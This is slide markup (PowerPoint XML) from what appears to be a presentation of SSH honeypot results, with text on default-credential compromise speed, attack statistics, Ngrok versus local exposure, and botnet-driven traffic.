            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="5631125" h="2447171">
                <a:moveTo>
                  <a:pt x="70160" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5560965" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5599713" y="0"/>
                  <a:pt x="5631125" y="31412"/>
                  <a:pt x="5631125" y="70160"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="5631125" y="2377011"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5631125" y="2415733"/>
                  <a:pt x="5599687" y="2447171"/>
                  <a:pt x="5560965" y="2447171"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="70160" y="2447171"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="31412" y="2447171"/>
                  <a:pt x="0" y="2415759"/>
                  <a:pt x="0" y="2377011"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="70160"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="31412"/>
                  <a:pt x="31412" y="0"/>
                  <a:pt x="70160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EF4444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5045" y="1570049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EF4444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43588" y="1666532"/>
            <a:ext cx="138147" cy="157882"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="138147" h="157882">
                <a:moveTo>
                  <a:pt x="104473" y="-3053"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="108143" y="-401"/>
                  <a:pt x="109500" y="4410"/>
                  <a:pt x="107835" y="8603"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="83659" y="69073"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="128279" y="69073"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="132442" y="69073"/>
                  <a:pt x="136142" y="71664"/>
                  <a:pt x="137561" y="75580"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="138979" y="79496"/>
                  <a:pt x="137777" y="83875"/>
                  <a:pt x="134601" y="86527"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="45792" y="160534"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="42307" y="163433"/>
                  <a:pt x="37343" y="163587"/>
                  <a:pt x="33673" y="160935"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="30004" y="158283"/>
                  <a:pt x="28647" y="153472"/>
                  <a:pt x="30312" y="149279"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="54488" y="88809"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9868" y="88809"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5705" y="88809"/>
                  <a:pt x="2004" y="86218"/>
                  <a:pt x="586" y="82302"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="-833" y="78386"/>
                  <a:pt x="370" y="74007"/>
                  <a:pt x="3546" y="71355"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="92355" y="-2652"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="95839" y="-5551"/>
                  <a:pt x="100804" y="-5705"/>
                  <a:pt x="104473" y="-3053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8" name="Text 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="991148" y="1622676"/>
            <a:ext cx="230683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Immediate Compromise Risk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5045" y="2026153"/>
            <a:ext cx="5341675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Any internet-facing SSH service using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highlight>
                  <a:srgbClr val="EF4444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default credentials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will be compromised within </a:t>
            </a:r>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1105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minutes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of exposure.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9430" y="2591896"/>
            <a:ext cx="5262734" cy="1061318"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="5262734" h="1061318">
                <a:moveTo>
                  <a:pt x="35087" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5227647" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5247025" y="0"/>
                  <a:pt x="5262734" y="15709"/>
                  <a:pt x="5262734" y="35087"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="5262734" y="1026231"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5262734" y="1045609"/>
                  <a:pt x="5247025" y="1061318"/>
                  <a:pt x="5227647" y="1061318"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="35087" y="1061318"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="15709" y="1061318"/>
                  <a:pt x="0" y="1045609"/>
                  <a:pt x="0" y="1026231"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="35087"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="15709"/>
                  <a:pt x="15709" y="0"/>
                  <a:pt x="35087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49071" y="2701537"/>
            <a:ext cx="510485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Evidence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74288" y="2982216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3" name="Text 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="872737" y="2947131"/>
            <a:ext cx="209632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Average time to first attack: 4 minutes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74288" y="3192725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5" name="Text 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="872737" y="3157640"/>
            <a:ext cx="235945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247 successful authentications in 24 hours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74288" y="3403235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7" name="Text 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="872737" y="3368150"/>
            <a:ext cx="2271747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4.2% success rate on credential attempts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55235" y="3986521"/>
            <a:ext cx="5631125" cy="2868190"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="5631125" h="2868190">
                <a:moveTo>
                  <a:pt x="70156" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5560969" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5599715" y="0"/>
                  <a:pt x="5631125" y="31410"/>
                  <a:pt x="5631125" y="70156"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="5631125" y="2798034"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5631125" y="2836780"/>
                  <a:pt x="5599715" y="2868190"/>
                  <a:pt x="5560969" y="2868190"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="70156" y="2868190"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="31410" y="2868190"/>
                  <a:pt x="0" y="2836780"/>
                  <a:pt x="0" y="2798034"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="70156"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="31410"/>
                  <a:pt x="31410" y="0"/>
                  <a:pt x="70156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6366F1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35045" y="4166331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6366F1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33721" y="4262814"/>
            <a:ext cx="157882" cy="157882"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="157882" h="157882">
                <a:moveTo>
                  <a:pt x="108513" y="86342"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="49646" y="86342"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="50541" y="106231"/>
                  <a:pt x="54950" y="124548"/>
                  <a:pt x="61210" y="137962"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="64725" y="145517"/>
                  <a:pt x="68518" y="150851"/>
                  <a:pt x="72034" y="154120"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="75487" y="157358"/>
                  <a:pt x="77862" y="157882"/>
                  <a:pt x="79095" y="157882"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="80329" y="157882"/>
                  <a:pt x="82703" y="157358"/>
                  <a:pt x="86157" y="154120"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="89672" y="150851"/>
                  <a:pt x="93465" y="145486"/>
                  <a:pt x="96980" y="137962"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="103240" y="124548"/>
                  <a:pt x="107650" y="106231"/>
                  <a:pt x="108544" y="86342"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="49616" y="71540"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="108482" y="71540"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="107619" y="51651"/>
                  <a:pt x="103209" y="33334"/>
                  <a:pt x="96949" y="19920"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="93434" y="12396"/>
                  <a:pt x="89641" y="7031"/>
                  <a:pt x="86126" y="3762"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="82672" y="524"/>
                  <a:pt x="80298" y="0"/>
                  <a:pt x="79064" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="77831" y="0"/>
                  <a:pt x="75457" y="524"/>
                  <a:pt x="72003" y="3762"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="68487" y="7031"/>
                  <a:pt x="64695" y="12396"/>
                  <a:pt x="61179" y="19920"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="54920" y="33334"/>
                  <a:pt x="50510" y="51651"/>
                  <a:pt x="49616" y="71540"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="34814" y="71540"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="35893" y="45144"/>
                  <a:pt x="42708" y="20630"/>
                  <a:pt x="52668" y="4533"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="24268" y="14586"/>
                  <a:pt x="3361" y="40457"/>
                  <a:pt x="463" y="71540"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="34814" y="71540"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="463" y="86342"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="3361" y="117425"/>
                  <a:pt x="24268" y="143296"/>
                  <a:pt x="52668" y="153349"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="42708" y="137253"/>
                  <a:pt x="35893" y="112738"/>
                  <a:pt x="34814" y="86342"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="463" y="86342"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="123314" y="86342"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="122235" y="112738"/>
                  <a:pt x="115420" y="137253"/>
                  <a:pt x="105460" y="153349"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="133861" y="143266"/>
                  <a:pt x="154768" y="117425"/>
                  <a:pt x="157666" y="86342"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="123314" y="86342"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="157666" y="71540"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="154768" y="40457"/>
                  <a:pt x="133861" y="14586"/>
                  <a:pt x="105460" y="4533"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="115420" y="20630"/>
                  <a:pt x="122235" y="45144"/>
                  <a:pt x="123314" y="71540"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="157666" y="71540"/>
                </a:ln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1" name="Text 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="991148" y="4218958"/>
            <a:ext cx="1912127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Exposure Impact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35045" y="4622435"/>
            <a:ext cx="5341675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use of a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highlight>
                  <a:srgbClr val="6366F1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global tunnel (Ngrok)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significantly increased the volume of high-sophistication traffic compared to local network exposure.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9430" y="5188178"/>
            <a:ext cx="5262734" cy="1096403"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="5262734" h="1096403">
                <a:moveTo>
                  <a:pt x="35085" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5227649" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5247026" y="0"/>
                  <a:pt x="5262734" y="15708"/>
                  <a:pt x="5262734" y="35085"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="5262734" y="1061318"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5262734" y="1080695"/>
                  <a:pt x="5247026" y="1096403"/>
                  <a:pt x="5227649" y="1096403"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="35085" y="1096403"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="15708" y="1096403"/>
                  <a:pt x="0" y="1080695"/>
                  <a:pt x="0" y="1061318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49071" y="5297819"/>
            <a:ext cx="510485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Comparative Analysis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9071" y="5543413"/>
            <a:ext cx="10437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Global (Ngrok EU)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85478" y="5543413"/>
            <a:ext cx="107008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636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5,842 connections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9071" y="5753922"/>
            <a:ext cx="5043453" cy="70170"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="5043453" h="70170">
                <a:moveTo>
                  <a:pt x="35085" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5008368" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5027745" y="0"/>
                  <a:pt x="5043453" y="15708"/>
                  <a:pt x="5043453" y="35085"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="5043453" y="35085"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5043453" y="54462"/>
                  <a:pt x="5027745" y="70170"/>
                  <a:pt x="5008368" y="70170"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="35085" y="70170"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="15721" y="70170"/>
                  <a:pt x="0" y="54449"/>
                  <a:pt x="0" y="35085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28" name="Shape 26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="649071" y="5753922"/>
            <a:ext cx="5043453" cy="70170"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="5043453" h="70170">
                <a:moveTo>
                  <a:pt x="35085" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5008368" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5027745" y="0"/>
                  <a:pt x="5043453" y="15708"/>
                  <a:pt x="5043453" y="35085"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="5043453" y="35085"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5043453" y="54462"/>
                  <a:pt x="5027745" y="70170"/>
                  <a:pt x="5008368" y="70170"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="35085" y="70170"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="15721" y="70170"/>
                  <a:pt x="0" y="54449"/>
                  <a:pt x="0" y="35085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6366F1"/>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="Text 27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="649071" y="5894262"/>
            <a:ext cx="1157801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Local Network (est.)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708091" y="5894262"/>
            <a:ext cx="10437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&lt;500 connections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9071" y="6104771"/>
            <a:ext cx="5043453" cy="70170"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="5043453" h="70170">
                <a:moveTo>
                  <a:pt x="35085" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5008368" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5027745" y="0"/>
                  <a:pt x="5043453" y="15708"/>
                  <a:pt x="5043453" y="35085"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="5043453" y="35085"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5043453" y="54462"/>
                  <a:pt x="5027745" y="70170"/>
                  <a:pt x="5008368" y="70170"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="35085" y="70170"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="15721" y="70170"/>
                  <a:pt x="0" y="54449"/>
                  <a:pt x="0" y="35085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262626"/>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="Shape 30"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="649071" y="6104771"/>
            <a:ext cx="403476" cy="70170"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="403476" h="70170">
                <a:moveTo>
                  <a:pt x="35085" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="368391" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="387768" y="0"/>
                  <a:pt x="403476" y="15708"/>
                  <a:pt x="403476" y="35085"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="403476" y="35085"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="403476" y="54462"/>
                  <a:pt x="387768" y="70170"/>
                  <a:pt x="368391" y="70170"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="35085" y="70170"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="15721" y="70170"/>
                  <a:pt x="0" y="54449"/>
                  <a:pt x="0" y="35085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8F8F8F"/>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="Shape 31"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6206600" y="1390239"/>
            <a:ext cx="5631125" cy="2657681"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="5631125" h="2657681">
                <a:moveTo>
                  <a:pt x="70163" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5560962" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5599712" y="0"/>
                  <a:pt x="5631125" y="31413"/>
                  <a:pt x="5631125" y="70163"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="5631125" y="2587518"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5631125" y="2626268"/>
                  <a:pt x="5599712" y="2657681"/>
                  <a:pt x="5560962" y="2657681"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="70163" y="2657681"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="31413" y="2657681"/>
                  <a:pt x="0" y="2626268"/>
                  <a:pt x="0" y="2587518"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="70163"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="31413"/>
                  <a:pt x="31413" y="0"/>
                  <a:pt x="7016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F59E0B">
                <a:alpha val="4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386410" y="1570049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F59E0B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465351" y="1666532"/>
            <a:ext cx="197353" cy="157882"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="197353" h="157882">
                <a:moveTo>
                  <a:pt x="108544" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="108544" y="-5458"/>
                  <a:pt x="104134" y="-9868"/>
                  <a:pt x="98676" y="-9868"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="93218" y="-9868"/>
                  <a:pt x="88809" y="-5458"/>
                  <a:pt x="88809" y="0"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="88809" y="19735"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="59206" y="19735"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="42863" y="19735"/>
                  <a:pt x="29603" y="32995"/>
                  <a:pt x="29603" y="49338"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="29603" y="118412"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="29603" y="134755"/>
                  <a:pt x="42863" y="148014"/>
                  <a:pt x="59206" y="148014"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="138147" y="148014"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="154490" y="148014"/>
                  <a:pt x="167750" y="134755"/>
                  <a:pt x="167750" y="118412"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="167750" y="49338"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="167750" y="32995"/>
                  <a:pt x="154490" y="19735"/>
                  <a:pt x="138147" y="19735"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="108544" y="19735"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="108544" y="0"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="49338" y="113478"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="49338" y="109376"/>
                  <a:pt x="52638" y="106077"/>
                  <a:pt x="56739" y="106077"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="66606" y="106077"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="70708" y="106077"/>
                  <a:pt x="74007" y="109376"/>
                  <a:pt x="74007" y="113478"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="74007" y="117579"/>
                  <a:pt x="70708" y="120878"/>
                  <a:pt x="66606" y="120878"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="56739" y="120878"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="52638" y="120878"/>
                  <a:pt x="49338" y="117579"/>
                  <a:pt x="49338" y="113478"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="86342" y="113478"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="86342" y="109376"/>
                  <a:pt x="89641" y="106077"/>
                  <a:pt x="93742" y="106077"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="103610" y="106077"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="107711" y="106077"/>
                  <a:pt x="111011" y="109376"/>
                  <a:pt x="111011" y="113478"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="111011" y="117579"/>
                  <a:pt x="107711" y="120878"/>
                  <a:pt x="103610" y="120878"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="93742" y="120878"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="89641" y="120878"/>
                  <a:pt x="86342" y="117579"/>
                  <a:pt x="86342" y="113478"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="123345" y="113478"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="123345" y="109376"/>
                  <a:pt x="126645" y="106077"/>
                  <a:pt x="130746" y="106077"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="140614" y="106077"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="144715" y="106077"/>
                  <a:pt x="148014" y="109376"/>
                  <a:pt x="148014" y="113478"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="148014" y="117579"/>
                  <a:pt x="144715" y="120878"/>
                  <a:pt x="140614" y="120878"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="130746" y="120878"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="126645" y="120878"/>
                  <a:pt x="123345" y="117579"/>
                  <a:pt x="123345" y="113478"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="69073" y="54272"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="77243" y="54272"/>
                  <a:pt x="83875" y="60904"/>
                  <a:pt x="83875" y="69073"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="83875" y="77243"/>
                  <a:pt x="77243" y="83875"/>
                  <a:pt x="69073" y="83875"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="60904" y="83875"/>
                  <a:pt x="54272" y="77243"/>
                  <a:pt x="54272" y="69073"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="54272" y="60904"/>
                  <a:pt x="60904" y="54272"/>
                  <a:pt x="69073" y="54272"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="113478" y="69073"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="113478" y="60904"/>
                  <a:pt x="120110" y="54272"/>
                  <a:pt x="128279" y="54272"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="136448" y="54272"/>
                  <a:pt x="143081" y="60904"/>
                  <a:pt x="143081" y="69073"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="143081" y="77243"/>
                  <a:pt x="136448" y="83875"/>
                  <a:pt x="128279" y="83875"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="120110" y="83875"/>
                  <a:pt x="113478" y="77243"/>
                  <a:pt x="113478" y="69073"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="19735" y="69073"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="19735" y="63615"/>
                  <a:pt x="15326" y="59206"/>
                  <a:pt x="9868" y="59206"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4410" y="59206"/>
                  <a:pt x="0" y="63615"/>
                  <a:pt x="0" y="69073"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="98676"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="104134"/>
                  <a:pt x="4410" y="108544"/>
                  <a:pt x="9868" y="108544"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="15326" y="108544"/>
                  <a:pt x="19735" y="104134"/>
                  <a:pt x="19735" y="98676"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="19735" y="69073"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="187485" y="59206"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="182027" y="59206"/>
                  <a:pt x="177617" y="63615"/>
                  <a:pt x="177617" y="69073"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="177617" y="98676"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="177617" y="104134"/>
                  <a:pt x="182027" y="108544"/>
                  <a:pt x="187485" y="108544"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="192943" y="108544"/>
                  <a:pt x="197353" y="104134"/>
                  <a:pt x="197353" y="98676"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="197353" y="69073"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="197353" y="63615"/>
                  <a:pt x="192943" y="59206"/>
                  <a:pt x="187485" y="5920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6" name="Text 34"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6842513" y="1622676"/>
            <a:ext cx="245594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Botnet Automation Dominance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86410" y="2026153"/>
            <a:ext cx="5341675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highlight>
                  <a:srgbClr val="F59E0B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Automated attacks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dominate with high-volume, repetitive patterns indicating sophisticated botnet infrastructure, not human attackers.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90795" y="2591896"/>
            <a:ext cx="5262734" cy="1271827"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
